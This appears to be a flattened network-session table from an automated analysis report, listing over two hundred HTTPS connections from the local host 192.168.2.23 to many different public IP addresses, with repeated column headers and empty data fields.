                                            21229192.168.2.2334966107.33.173.136443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21230192.168.2.2350124187.139.196.236443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21231192.168.2.235618493.226.133.29443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21232192.168.2.23392488.54.33.185443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21233192.168.2.2339306181.248.189.102443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21234192.168.2.234819069.101.140.32443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21235192.168.2.23380684.99.188.129443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21236192.168.2.233398488.91.137.62443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21237192.168.2.235673260.97.104.143443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21238192.168.2.2355378195.192.179.206443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21239192.168.2.2359872128.165.221.107443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21240192.168.2.234919627.238.179.162443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21241192.168.2.2360974159.137.31.1443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21242192.168.2.2341722139.125.216.187443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21243192.168.2.2353126203.68.58.46443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21244192.168.2.234678297.176.194.252443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21245192.168.2.233641242.56.151.228443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21246192.168.2.2335670136.32.224.244443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21247192.168.2.2352514195.33.211.97443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21248192.168.2.2343520173.162.234.207443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21249192.168.2.235078025.137.43.203443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21250192.168.2.2347894212.97.181.23443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21251192.168.2.2353948108.95.92.51443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21252192.168.2.2334548201.127.216.157443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21253192.168.2.2348336205.27.111.127443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21254192.168.2.2357138204.248.30.248443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21255192.168.2.235631296.229.68.13443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21256192.168.2.2334654196.230.191.35443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21257192.168.2.2336222118.213.12.147443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21258192.168.2.2349436139.8.186.98443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21259192.168.2.2353036202.184.177.6443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21260192.168.2.235323818.216.52.172443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21261192.168.2.2350632192.23.211.236443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21262192.168.2.234787057.37.129.116443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21263192.168.2.235252660.38.115.139443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21264192.168.2.234119287.0.15.23443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21265192.168.2.2354108216.79.79.251443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21266192.168.2.235236259.146.124.197443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21267192.168.2.234659844.98.25.191443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21268192.168.2.2346918157.166.27.187443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21269192.168.2.2346166141.184.64.255443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21270192.168.2.234645844.139.37.213443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21271192.168.2.2351986128.20.159.240443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21272192.168.2.23502302.17.105.251443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21273192.168.2.2346382155.166.96.100443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21274192.168.2.2347412139.165.11.181443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21275192.168.2.2337416197.71.211.39443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21276192.168.2.2337052141.221.215.66443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21277192.168.2.2350492190.45.63.212443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21278192.168.2.23605821.194.188.237443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21279192.168.2.2343012154.133.176.75443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21280192.168.2.2352712193.15.215.139443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21281192.168.2.234596090.16.195.154443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21282192.168.2.234056267.248.34.170443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21283192.168.2.2357558110.222.245.160443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21284192.168.2.233728239.188.230.196443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21285192.168.2.235127632.221.154.214443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21286192.168.2.2345568197.106.163.26443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21287192.168.2.2347176167.165.153.108443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21288192.168.2.235045674.92.147.181443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21289192.168.2.233412095.124.72.54443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21290192.168.2.2347912183.236.171.115443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21291192.168.2.2360490160.39.5.166443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21292192.168.2.235637836.7.102.35443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21293192.168.2.2335436216.73.144.175443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21294192.168.2.2359046116.30.206.160443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21295192.168.2.2352454161.117.146.151443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21296192.168.2.234244863.142.197.103443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21297192.168.2.233937614.231.26.5443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21298192.168.2.233980644.80.226.185443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21299192.168.2.2354934204.176.182.208443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21300192.168.2.2352358154.165.191.168443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21301192.168.2.2355570219.57.130.146443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21302192.168.2.235486649.247.84.198443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21303192.168.2.2354608198.124.114.68443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21304192.168.2.2337822171.27.33.12443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21305192.168.2.2345394142.196.232.104443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21306192.168.2.23558882.97.223.240443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21307192.168.2.2359558186.215.74.57443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21308192.168.2.233499253.37.233.170443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21309192.168.2.233950693.58.156.122443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21310192.168.2.23440489.16.92.200443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21311192.168.2.235467492.154.181.24443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21312192.168.2.234903086.21.41.225443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21313192.168.2.234997475.35.172.214443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21314192.168.2.233794091.245.63.90443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21315192.168.2.23579765.231.75.118443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21316192.168.2.2345968128.178.93.142443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21317192.168.2.2345776141.20.77.55443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21318192.168.2.2332912153.161.181.23443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21319192.168.2.234020019.232.235.235443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21320192.168.2.233472825.3.220.219443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21321192.168.2.233286499.132.219.148443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21322192.168.2.2344672123.130.209.222443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21323192.168.2.2339316219.246.154.48443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21324192.168.2.2345422140.23.60.29443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21325192.168.2.234919486.90.102.162443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21326192.168.2.2340988200.128.111.105443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21327192.168.2.233632467.87.24.191443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21328192.168.2.2357110182.142.27.163443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21329192.168.2.2343344143.169.207.98443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21330192.168.2.235280258.66.240.240443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21331192.168.2.233382473.207.42.18443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21332192.168.2.2356382220.232.54.239443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21333192.168.2.235169267.38.65.243443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21334192.168.2.2338390185.253.128.240443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21335192.168.2.233285058.151.181.139443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21336192.168.2.234302848.164.58.174443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21337192.168.2.2340000114.55.215.20443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21338192.168.2.2354030120.22.210.95443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21339192.168.2.2354682125.112.204.178443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21340192.168.2.2342718169.89.35.3443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21341192.168.2.235053661.116.242.207443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21342192.168.2.233545098.163.135.22443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21343192.168.2.234014268.30.217.181443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21344192.168.2.235834639.246.131.222443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21345192.168.2.236066624.224.224.76443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21346192.168.2.2348450161.9.72.56443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21347192.168.2.2335032162.94.214.1443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21348192.168.2.2352574160.113.152.27443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21349192.168.2.2359040223.186.127.148443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21350192.168.2.235166271.205.101.126443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21351192.168.2.23342668.176.35.249443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21352192.168.2.2360352137.27.154.160443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21353192.168.2.2351260152.141.43.29443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21354192.168.2.2337618114.217.94.16443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21355192.168.2.235944025.42.120.161443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21356192.168.2.2360622143.46.193.118443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21357192.168.2.234326277.252.108.14443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21358192.168.2.2341190166.119.64.97443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21359192.168.2.2359950135.1.251.95443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21360192.168.2.2348550159.229.162.136443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21361192.168.2.2345726179.174.238.211443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21362192.168.2.234155274.141.203.11443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21363192.168.2.2341124181.127.224.189443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21364192.168.2.2345448187.162.107.51443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21365192.168.2.235875813.77.249.24443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21366192.168.2.233644870.152.193.41443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21367192.168.2.2334684165.65.27.104443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21368192.168.2.2334838150.212.198.128443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21369192.168.2.23377288.36.67.138443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21370192.168.2.2355056141.167.225.88443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21371192.168.2.233311079.178.131.105443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21372192.168.2.2333104156.105.142.199443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21373192.168.2.233384442.134.47.43443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21374192.168.2.2347604158.192.225.74443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21375192.168.2.2359974103.228.183.173443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21376192.168.2.2355590180.111.13.237443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21377192.168.2.234940420.59.109.162443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21378192.168.2.2356418196.25.44.25443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21379192.168.2.235099866.55.171.245443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21380192.168.2.233536885.174.183.196443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21381192.168.2.233901024.165.184.253443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21382192.168.2.233761862.95.221.184443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21383192.168.2.234113251.64.45.72443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21384192.168.2.2340250151.27.33.197443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21385192.168.2.234763073.82.48.121443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21386192.168.2.2335794121.170.105.130443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21387192.168.2.2351234172.243.219.130443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21388192.168.2.2336584108.153.115.179443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21389192.168.2.2338522221.98.38.234443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21390192.168.2.234646874.51.158.125443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21391192.168.2.233804293.20.238.6443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21392192.168.2.233603458.101.33.181443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21393192.168.2.2335952163.196.103.122443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21394192.168.2.234330019.248.143.180443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21395192.168.2.23578621.168.3.253443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21396192.168.2.2344198123.247.78.127443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21397192.168.2.234228480.159.251.246443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21398192.168.2.2346784219.178.167.23443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21399192.168.2.234306265.206.10.137443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21400192.168.2.2346212109.176.199.134443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21401192.168.2.233321657.3.57.67443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21402192.168.2.234313648.153.45.118443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21403192.168.2.2344786125.84.117.153443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21404192.168.2.2359034179.198.76.81443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21405192.168.2.235113838.177.245.103443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21406192.168.2.233403258.23.48.131443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21407192.168.2.2357844104.12.125.3443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21408192.168.2.233507851.96.53.99443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21409192.168.2.235614040.184.82.81443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21410192.168.2.234527814.108.43.125443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21411192.168.2.2339856210.73.8.218443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21412192.168.2.233402417.144.29.177443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21413192.168.2.235131680.236.189.231443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21414192.168.2.2354152101.199.253.12443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21415192.168.2.233928241.10.90.147443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21416192.168.2.2336162117.76.21.176443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21417192.168.2.2345848218.164.91.213443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21418192.168.2.235250054.239.253.233443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21419192.168.2.2358872109.251.249.61443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21420192.168.2.233594825.33.56.244443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21421192.168.2.2345864203.44.115.239443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21422192.168.2.234394824.56.99.214443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21423192.168.2.2342480209.24.221.152443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21424192.168.2.233518490.252.240.56443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21425192.168.2.2355874156.211.71.210443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21426192.168.2.2353590159.75.207.15443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21427192.168.2.235015291.170.164.98443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21428192.168.2.2354386155.129.43.129443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21429192.168.2.234621077.24.83.18443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21430192.168.2.2354992193.180.18.20443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21431192.168.2.2345116196.251.138.182443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21432192.168.2.233397458.146.238.191443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21433192.168.2.2353542157.127.159.200443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21434192.168.2.2336886174.204.103.158443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21435192.168.2.2358388193.190.184.201443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21436192.168.2.2334292150.50.216.164443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21437192.168.2.234495249.105.207.141443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21438192.168.2.235925449.66.173.108443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21439192.168.2.235735639.79.125.57443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21440192.168.2.2351716219.154.93.59443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21441192.168.2.2336712120.2.90.161443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21442192.168.2.2334230122.137.7.84443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21443192.168.2.2336546109.23.244.17443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21444192.168.2.2360530216.54.26.127443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21445192.168.2.2339758171.121.224.116443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21446192.168.2.233973473.39.129.161443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21447192.168.2.235881051.125.247.20443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21448192.168.2.235019051.26.255.2443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21449192.168.2.2345516136.7.126.165443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21450192.168.2.2359624104.231.113.246443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
